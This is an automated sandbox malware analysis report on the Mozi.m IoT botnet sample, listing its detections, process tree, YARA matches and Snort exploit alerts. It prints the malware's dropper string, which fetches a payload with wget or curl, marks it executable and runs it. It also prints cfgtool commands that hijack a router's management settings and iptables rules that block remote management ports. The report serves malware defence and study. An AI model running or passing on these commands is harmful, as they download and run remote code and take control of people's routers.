Loading ...

Play interactive tourEdit tour

Analysis Report Mozi.m

Overview

General Information

Sample Name:Mozi.m
Analysis ID:336612
MD5:eec5c6c219535fba3a0492ea8118b397
SHA1:292559e94f1c04b7d0c65d4a01bbbc5dc1ff6f21
SHA256:12013662c71da69de977c04cd7021f13a70cf7bed4ca6c82acbc100464d4b0ef

Detection

Mirai
Score:100
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Mirai
Yara detected Mirai
Yara detected Mirai
Connects to many ports of the same IP (likely port scanning)
Drops files in suspicious directories
Executes the "iptables" command to insert, remove and/or manipulate rules
Found strings indicative of a multi-platform dropper
Opens /proc/net/* files useful for finding connected devices and routers
Sample reads /proc/mounts (often used for finding a writable filesystem)
Sample tries to persist itself using /etc/profile
Sample tries to persist itself using System V runlevels
Terminates several processes with shell command 'killall'
Uses known network protocols on non-standard ports
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "iptables" command used for managing IP filtering and manipulation
HTTP GET or POST without a user agent
Reads system information from the proc file system
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample contains strings indicative of password brute-forcing capabilities
Sample contains strings that are potentially command strings
Sample has stripped symbol table
Sample listens on a socket
Sample tries to set the executable flag
Uses the "uname" system call to query kernel version information (possible evasion)
Writes ELF files to disk
Writes HTML files containing JavaScript to disk
Writes shell script files to disk
Yara signature match

Classification

Startup

  • system is lnxubuntu1
  • Mozi.m (PID: 4564, Parent: 4517, MD5: eec5c6c219535fba3a0492ea8118b397) Arguments: /usr/bin/qemu-arm /tmp/Mozi.m
    • Mozi.m New Fork (PID: 4578, Parent: 4564)
      • Mozi.m New Fork (PID: 4580, Parent: 4578)
        • Mozi.m New Fork (PID: 4582, Parent: 4580)
        • sh (PID: 4582, Parent: 4580, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "killall -9 telnetd utelnetd scfgmgr"
          • sh New Fork (PID: 4584, Parent: 4582)
          • killall (PID: 4584, Parent: 4582, MD5: df59c8b62bfcf5b3bd7feaaa2295a9f7) Arguments: killall -9 telnetd utelnetd scfgmgr
        • Mozi.m New Fork (PID: 4601, Parent: 4580)
        • Mozi.m New Fork (PID: 4602, Parent: 4580)
        • Mozi.m New Fork (PID: 4603, Parent: 4580)
          • Mozi.m New Fork (PID: 4616, Parent: 4603)
          • sh (PID: 4616, Parent: 4603, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 56870 -j ACCEPT"
            • sh New Fork (PID: 4618, Parent: 4616)
            • iptables (PID: 4618, Parent: 4616, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --destination-port 56870 -j ACCEPT
              • iptables New Fork (PID: 4622, Parent: 4618)
              • modprobe (PID: 4622, Parent: 4618, MD5: 3d0e6fb594a9ad9c854ace3e507f86c5) Arguments: /sbin/modprobe ip_tables
          • Mozi.m New Fork (PID: 4650, Parent: 4603)
          • sh (PID: 4650, Parent: 4603, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 56870 -j ACCEPT"
            • sh New Fork (PID: 4652, Parent: 4650)
            • iptables (PID: 4652, Parent: 4650, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --source-port 56870 -j ACCEPT
          • Mozi.m New Fork (PID: 4653, Parent: 4603)
          • sh (PID: 4653, Parent: 4603, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I PREROUTING -t nat -p tcp --destination-port 56870 -j ACCEPT"
            • sh New Fork (PID: 4655, Parent: 4653)
            • iptables (PID: 4655, Parent: 4653, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I PREROUTING -t nat -p tcp --destination-port 56870 -j ACCEPT
          • Mozi.m New Fork (PID: 4689, Parent: 4603)
          • sh (PID: 4689, Parent: 4603, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --source-port 56870 -j ACCEPT"
            • sh New Fork (PID: 4699, Parent: 4689)
            • iptables (PID: 4699, Parent: 4689, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I POSTROUTING -t nat -p tcp --source-port 56870 -j ACCEPT
          • Mozi.m New Fork (PID: 4702, Parent: 4603)
          • sh (PID: 4702, Parent: 4603, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --dport 56870 -j ACCEPT"
            • sh New Fork (PID: 4708, Parent: 4702)
            • iptables (PID: 4708, Parent: 4702, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --dport 56870 -j ACCEPT
          • Mozi.m New Fork (PID: 4728, Parent: 4603)
          • sh (PID: 4728, Parent: 4603, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 56870 -j ACCEPT"
            • sh New Fork (PID: 4736, Parent: 4728)
            • iptables (PID: 4736, Parent: 4728, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --sport 56870 -j ACCEPT
          • Mozi.m New Fork (PID: 4739, Parent: 4603)
          • sh (PID: 4739, Parent: 4603, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I PREROUTING -t nat -p tcp --dport 56870 -j ACCEPT"
            • sh New Fork (PID: 4742, Parent: 4739)
            • iptables (PID: 4742, Parent: 4739, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I PREROUTING -t nat -p tcp --dport 56870 -j ACCEPT
          • Mozi.m New Fork (PID: 4750, Parent: 4603)
          • sh (PID: 4750, Parent: 4603, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --sport 56870 -j ACCEPT"
            • sh New Fork (PID: 4761, Parent: 4750)
            • iptables (PID: 4761, Parent: 4750, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I POSTROUTING -t nat -p tcp --sport 56870 -j ACCEPT
        • Mozi.m New Fork (PID: 4607, Parent: 4580)
        • Mozi.m New Fork (PID: 4612, Parent: 4580)
        • Mozi.m New Fork (PID: 4614, Parent: 4580)
        • Mozi.m New Fork (PID: 4875, Parent: 4580)
        • sh (PID: 4875, Parent: 4580, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 58000 -j DROP"
          • sh New Fork (PID: 4877, Parent: 4875)
          • iptables (PID: 4877, Parent: 4875, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --destination-port 58000 -j DROP
        • Mozi.m New Fork (PID: 4878, Parent: 4580)
        • sh (PID: 4878, Parent: 4580, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 58000 -j DROP"
          • sh New Fork (PID: 4880, Parent: 4878)
          • iptables (PID: 4880, Parent: 4878, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
        • Mozi.m New Fork (PID: 4881, Parent: 4580)
        • sh (PID: 4881, Parent: 4580, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --dport 58000 -j DROP"
          • sh New Fork (PID: 4883, Parent: 4881)
          • iptables (PID: 4883, Parent: 4881, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --dport 58000 -j DROP
        • Mozi.m New Fork (PID: 4885, Parent: 4580)
        • sh (PID: 4885, Parent: 4580, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 58000 -j DROP"
          • sh New Fork (PID: 4892, Parent: 4885)
          • iptables (PID: 4892, Parent: 4885, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --sport 58000 -j DROP
        • Mozi.m New Fork (PID: 4912, Parent: 4580)
        • sh (PID: 4912, Parent: 4580, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL \"http://127.0.0.1\""
        • Mozi.m New Fork (PID: 4925, Parent: 4580)
        • sh (PID: 4925, Parent: 4580, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword \"acsMozi\""
        • Mozi.m New Fork (PID: 4940, Parent: 4580)
        • sh (PID: 4940, Parent: 4580, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 35000 -j DROP"
          • sh New Fork (PID: 4950, Parent: 4940)
          • iptables (PID: 4950, Parent: 4940, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --destination-port 35000 -j DROP
        • Mozi.m New Fork (PID: 4975, Parent: 4580)
        • sh (PID: 4975, Parent: 4580, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 50023 -j DROP"
          • sh New Fork (PID: 4985, Parent: 4975)
          • iptables (PID: 4985, Parent: 4975, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --destination-port 50023 -j DROP
        • Mozi.m New Fork (PID: 5005, Parent: 4580)
        • sh (PID: 5005, Parent: 4580, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 50023 -j DROP"
          • sh New Fork (PID: 5011, Parent: 5005)
          • iptables (PID: 5011, Parent: 5005, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
        • Mozi.m New Fork (PID: 5012, Parent: 4580)
        • sh (PID: 5012, Parent: 4580, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 35000 -j DROP"
          • sh New Fork (PID: 5014, Parent: 5012)
          • iptables (PID: 5014, Parent: 5012, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
        • Mozi.m New Fork (PID: 5015, Parent: 4580)
        • sh (PID: 5015, Parent: 4580, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 7547 -j DROP"
          • sh New Fork (PID: 5019, Parent: 5015)
          • iptables (PID: 5019, Parent: 5015, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --destination-port 7547 -j DROP
        • Mozi.m New Fork (PID: 5035, Parent: 4580)
        • sh (PID: 5035, Parent: 4580, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 7547 -j DROP"
          • sh New Fork (PID: 5044, Parent: 5035)
          • iptables (PID: 5044, Parent: 5035, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
        • Mozi.m New Fork (PID: 5069, Parent: 4580)
        • sh (PID: 5069, Parent: 4580, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --dport 35000 -j DROP"
          • sh New Fork (PID: 5079, Parent: 5069)
          • iptables (PID: 5079, Parent: 5069, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --dport 35000 -j DROP
        • Mozi.m New Fork (PID: 5097, Parent: 4580)
        • sh (PID: 5097, Parent: 4580, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --dport 50023 -j DROP"
          • sh New Fork (PID: 5105, Parent: 5097)
          • iptables (PID: 5105, Parent: 5097, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --dport 50023 -j DROP
        • Mozi.m New Fork (PID: 5112, Parent: 4580)
        • sh (PID: 5112, Parent: 4580, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 50023 -j DROP"
          • sh New Fork (PID: 5121, Parent: 5112)
          • iptables (PID: 5121, Parent: 5112, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --sport 50023 -j DROP
        • Mozi.m New Fork (PID: 5139, Parent: 4580)
        • sh (PID: 5139, Parent: 4580, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 35000 -j DROP"
          • sh New Fork (PID: 5144, Parent: 5139)
          • iptables (PID: 5144, Parent: 5139, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --sport 35000 -j DROP
        • Mozi.m New Fork (PID: 5146, Parent: 4580)
        • sh (PID: 5146, Parent: 4580, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p tcp --dport 7547 -j DROP"
          • sh New Fork (PID: 5152, Parent: 5146)
          • iptables (PID: 5152, Parent: 5146, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p tcp --dport 7547 -j DROP
        • Mozi.m New Fork (PID: 5169, Parent: 4580)
        • sh (PID: 5169, Parent: 4580, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 7547 -j DROP"
          • sh New Fork (PID: 5183, Parent: 5169)
          • iptables (PID: 5183, Parent: 5169, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p tcp --sport 7547 -j DROP
        • Mozi.m New Fork (PID: 5199, Parent: 4580)
        • sh (PID: 5199, Parent: 4580, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p udp --destination-port 14165 -j ACCEPT"
          • sh New Fork (PID: 5201, Parent: 5199)
          • iptables (PID: 5201, Parent: 5199, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p udp --destination-port 14165 -j ACCEPT
        • Mozi.m New Fork (PID: 5202, Parent: 4580)
        • sh (PID: 5202, Parent: 4580, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p udp --source-port 14165 -j ACCEPT"
          • sh New Fork (PID: 5204, Parent: 5202)
          • iptables (PID: 5204, Parent: 5202, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p udp --source-port 14165 -j ACCEPT
        • Mozi.m New Fork (PID: 5205, Parent: 4580)
        • sh (PID: 5205, Parent: 4580, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I PREROUTING -t nat -p udp --destination-port 14165 -j ACCEPT"
          • sh New Fork (PID: 5207, Parent: 5205)
          • iptables (PID: 5207, Parent: 5205, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I PREROUTING -t nat -p udp --destination-port 14165 -j ACCEPT
        • Mozi.m New Fork (PID: 5208, Parent: 4580)
        • sh (PID: 5208, Parent: 4580, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I POSTROUTING -t nat -p udp --source-port 14165 -j ACCEPT"
          • sh New Fork (PID: 5211, Parent: 5208)
          • iptables (PID: 5211, Parent: 5208, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I POSTROUTING -t nat -p udp --source-port 14165 -j ACCEPT
        • Mozi.m New Fork (PID: 5220, Parent: 4580)
        • sh (PID: 5220, Parent: 4580, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I INPUT -p udp --dport 14165 -j ACCEPT"
          • sh New Fork (PID: 5232, Parent: 5220)
          • iptables (PID: 5232, Parent: 5220, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I INPUT -p udp --dport 14165 -j ACCEPT
        • Mozi.m New Fork (PID: 5254, Parent: 4580)
        • sh (PID: 5254, Parent: 4580, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I OUTPUT -p udp --sport 14165 -j ACCEPT"
          • sh New Fork (PID: 5268, Parent: 5254)
          • iptables (PID: 5268, Parent: 5254, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I OUTPUT -p udp --sport 14165 -j ACCEPT
        • Mozi.m New Fork (PID: 5290, Parent: 4580)
        • sh (PID: 5290, Parent: 4580, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I PREROUTING -t nat -p udp --dport 14165 -j ACCEPT"
          • sh New Fork (PID: 5303, Parent: 5290)
          • iptables (PID: 5303, Parent: 5290, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I PREROUTING -t nat -p udp --dport 14165 -j ACCEPT
        • Mozi.m New Fork (PID: 5326, Parent: 4580)
        • sh (PID: 5326, Parent: 4580, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -c "iptables -I POSTROUTING -t nat -p udp --sport 14165 -j ACCEPT"
          • sh New Fork (PID: 5333, Parent: 5326)
          • iptables (PID: 5333, Parent: 5326, MD5: e986504da7dab031032b3d3eac5b643e) Arguments: iptables -I POSTROUTING -t nat -p udp --sport 14165 -j ACCEPT
  • upstart New Fork (PID: 4794, Parent: 3310)
  • sh (PID: 4794, Parent: 3310, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -e /proc/self/fd/9
    • sh New Fork (PID: 4795, Parent: 4794)
    • date (PID: 4795, Parent: 4794, MD5: 54903b613f9019bfca9f5d28a4fff34e) Arguments: date
    • sh New Fork (PID: 4796, Parent: 4794)
    • apport-checkreports (PID: 4796, Parent: 4794, MD5: 1a7d84ebc34df04e55ca3723541f48c9) Arguments: /usr/bin/python3 /usr/share/apport/apport-checkreports --system
  • upstart New Fork (PID: 4821, Parent: 3310)
  • sh (PID: 4821, Parent: 3310, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -e /proc/self/fd/9
    • sh New Fork (PID: 4822, Parent: 4821)
    • date (PID: 4822, Parent: 4821, MD5: 54903b613f9019bfca9f5d28a4fff34e) Arguments: date
    • sh New Fork (PID: 4823, Parent: 4821)
    • apport-gtk (PID: 4823, Parent: 4821, MD5: ec58a49a30ef6a29406a204f28cc7d87) Arguments: /usr/bin/python3 /usr/share/apport/apport-gtk
  • upstart New Fork (PID: 4848, Parent: 3310)
  • sh (PID: 4848, Parent: 3310, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -e /proc/self/fd/9
    • sh New Fork (PID: 4849, Parent: 4848)
    • date (PID: 4849, Parent: 4848, MD5: 54903b613f9019bfca9f5d28a4fff34e) Arguments: date
    • sh New Fork (PID: 4866, Parent: 4848)
    • apport-gtk (PID: 4866, Parent: 4848, MD5: ec58a49a30ef6a29406a204f28cc7d87) Arguments: /usr/bin/python3 /usr/share/apport/apport-gtk
  • cleanup

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
Mozi.mSUSP_XORed_MozillaDetects suspicious XORed keyword - Mozilla/5.0Florian Roth
  • 0x37450:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x374c0:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x37530:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x375a0:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x37610:$xo1: oMXKNNC\x0D\x17\x0C\x12
Mozi.mJoeSecurity_Mirai_8Yara detected MiraiJoe Security
    Mozi.mJoeSecurity_Mirai_9Yara detected MiraiJoe Security
      Mozi.mJoeSecurity_Mirai_4Yara detected MiraiJoe Security

        PCAP (Network Traffic)

        SourceRuleDescriptionAuthorStrings
        dump.pcapJoeSecurity_Mirai_4Yara detected MiraiJoe Security

          Dropped Files

          SourceRuleDescriptionAuthorStrings
          /usr/networksSUSP_XORed_MozillaDetects suspicious XORed keyword - Mozilla/5.0Florian Roth
          • 0x37450:$xo1: oMXKNNC\x0D\x17\x0C\x12
          • 0x374c0:$xo1: oMXKNNC\x0D\x17\x0C\x12
          • 0x37530:$xo1: oMXKNNC\x0D\x17\x0C\x12
          • 0x375a0:$xo1: oMXKNNC\x0D\x17\x0C\x12
          • 0x37610:$xo1: oMXKNNC\x0D\x17\x0C\x12
          /usr/networksJoeSecurity_Mirai_8Yara detected MiraiJoe Security
            /usr/networksJoeSecurity_Mirai_9Yara detected MiraiJoe Security
              /usr/networksJoeSecurity_Mirai_4Yara detected MiraiJoe Security

                Signature Overview

                Click to jump to signature section

                Show All Signature Results

                AV Detection:

                barindex
                Antivirus / Scanner detection for submitted sampleShow sources
                Source: Mozi.mAvira: detected
                Antivirus detection for dropped fileShow sources
                Source: /usr/networksAvira: detection malicious, Label: LINUX/Mirai.lldau
                Multi AV Scanner detection for submitted fileShow sources
                Source: Mozi.mVirustotal: Detection: 70%Perma Link
                Source: Mozi.mReversingLabs: Detection: 68%

                Spreading:

                barindex
                Found strings indicative of a multi-platform dropperShow sources
                Source: Mozi.mString: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
                Source: Mozi.mString: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/bin.sh ||curl -O http://%s:%d/bin.sh ||/bin/busybox wget http://%s:%d/bin.sh;chmod 777 bin.sh ||(cp /bin/ls bix.sh;cat bin.sh>bix.sh;rm bin.sh;cp bix.sh bin.sh;rm bix.sh);sh bin.sh %s;/bin/busybox echo -e '%s'
                Source: Mozi.mString: nvalidailedncorrecteniedoodbyebad$ELFshelldvrdvswelcomesuccessmdm96259615-cdpF6connectedBCM#usernamepass>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
                Opens /proc/net/* files useful for finding connected devices and routersShow sources
                Source: /tmp/Mozi.m (PID: 4603)Opens: /proc/net/route
                Source: /tmp/Mozi.m (PID: 4603)Opens: /proc/net/route

                Networking:

                barindex
                Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:47982 -> 23.44.146.105:80
                Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:47982 -> 23.44.146.105:80
                Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.44.146.105:80 -> 192.168.2.20:47982
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 83.163.237.112: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 46.165.139.60: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 195.229.0.147: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 38.104.123.122: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 78.54.73.174: -> 192.168.2.20:
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 67.187.218.82: -> 192.168.2.20:
                Source: TrafficSnort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:51592 -> 35.168.169.85:80
                Source: TrafficSnort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:51592 -> 35.168.169.85:80
                Source: TrafficSnort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:54436 -> 107.170.200.206:80
                Source: TrafficSnort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 59.99.92.197:32998 -> 192.168.2.20:14165
                Source: TrafficSnort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 117.202.68.123:8080 -> 192.168.2.20:14165
                Source: TrafficSnort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 220.77.193.240:5353 -> 192.168.2.20:14165
                Source: TrafficSnort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 117.215.212.106:18221 -> 192.168.2.20:14165
                Source: TrafficSnort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:59680 -> 115.15.161.14:8080
                Source: TrafficSnort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:59680 -> 115.15.161.14:8080
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 77.190.174.8: -> 192.168.2.20:
                Source: TrafficSnort IDS: 401 ICMP Destination Unreachable Network Unreachable 81.228.84.35: -> 192.168.2.20:
                Source: TrafficSnort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:52344 -> 107.154.165.234:80
                Source: TrafficSnort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:52344 -> 107.154.165.234:80
                Source: TrafficSnort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:49116 -> 195.154.172.83:80
                Source: TrafficSnort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:49116 -> 195.154.172.83:80
                Source: TrafficSnort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:59784 -> 158.199.197.56:80
                Source: TrafficSnort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:59784 -> 158.199.197.56:80
                Source: TrafficSnort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:45960 -> 104.97.230.229:80
                Source: TrafficSnort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:45960 -> 104.97.230.229:80
                Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.97.230.229:80 -> 192.168.2.20:45960
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 80.140.241.117: -> 192.168.2.20:
                Source: TrafficSnort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:52400 -> 66.49.194.21:80
                Source: TrafficSnort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:52400 -> 66.49.194.21:80
                Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:34684 -> 203.146.142.202:80
                Source: TrafficSnort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:46778 -> 23.243.117.203:8080
                Source: TrafficSnort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:46778 -> 23.243.117.203:8080
                Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:34684 -> 203.146.142.202:80
                Source: TrafficSnort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:36646 -> 104.238.159.33:80
                Source: TrafficSnort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:36646 -> 104.238.159.33:80
                Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 46.164.1.124: -> 192.168.2.20:
                Source: TrafficSnort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 185.181.181.25: -> 192.168.2.20:
                Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:48360 -> 54.164.156.191:80
                Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:48360 -> 54.164.156.191:80
                Source: TrafficSnort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:50064 -> 107.20.106.251:80
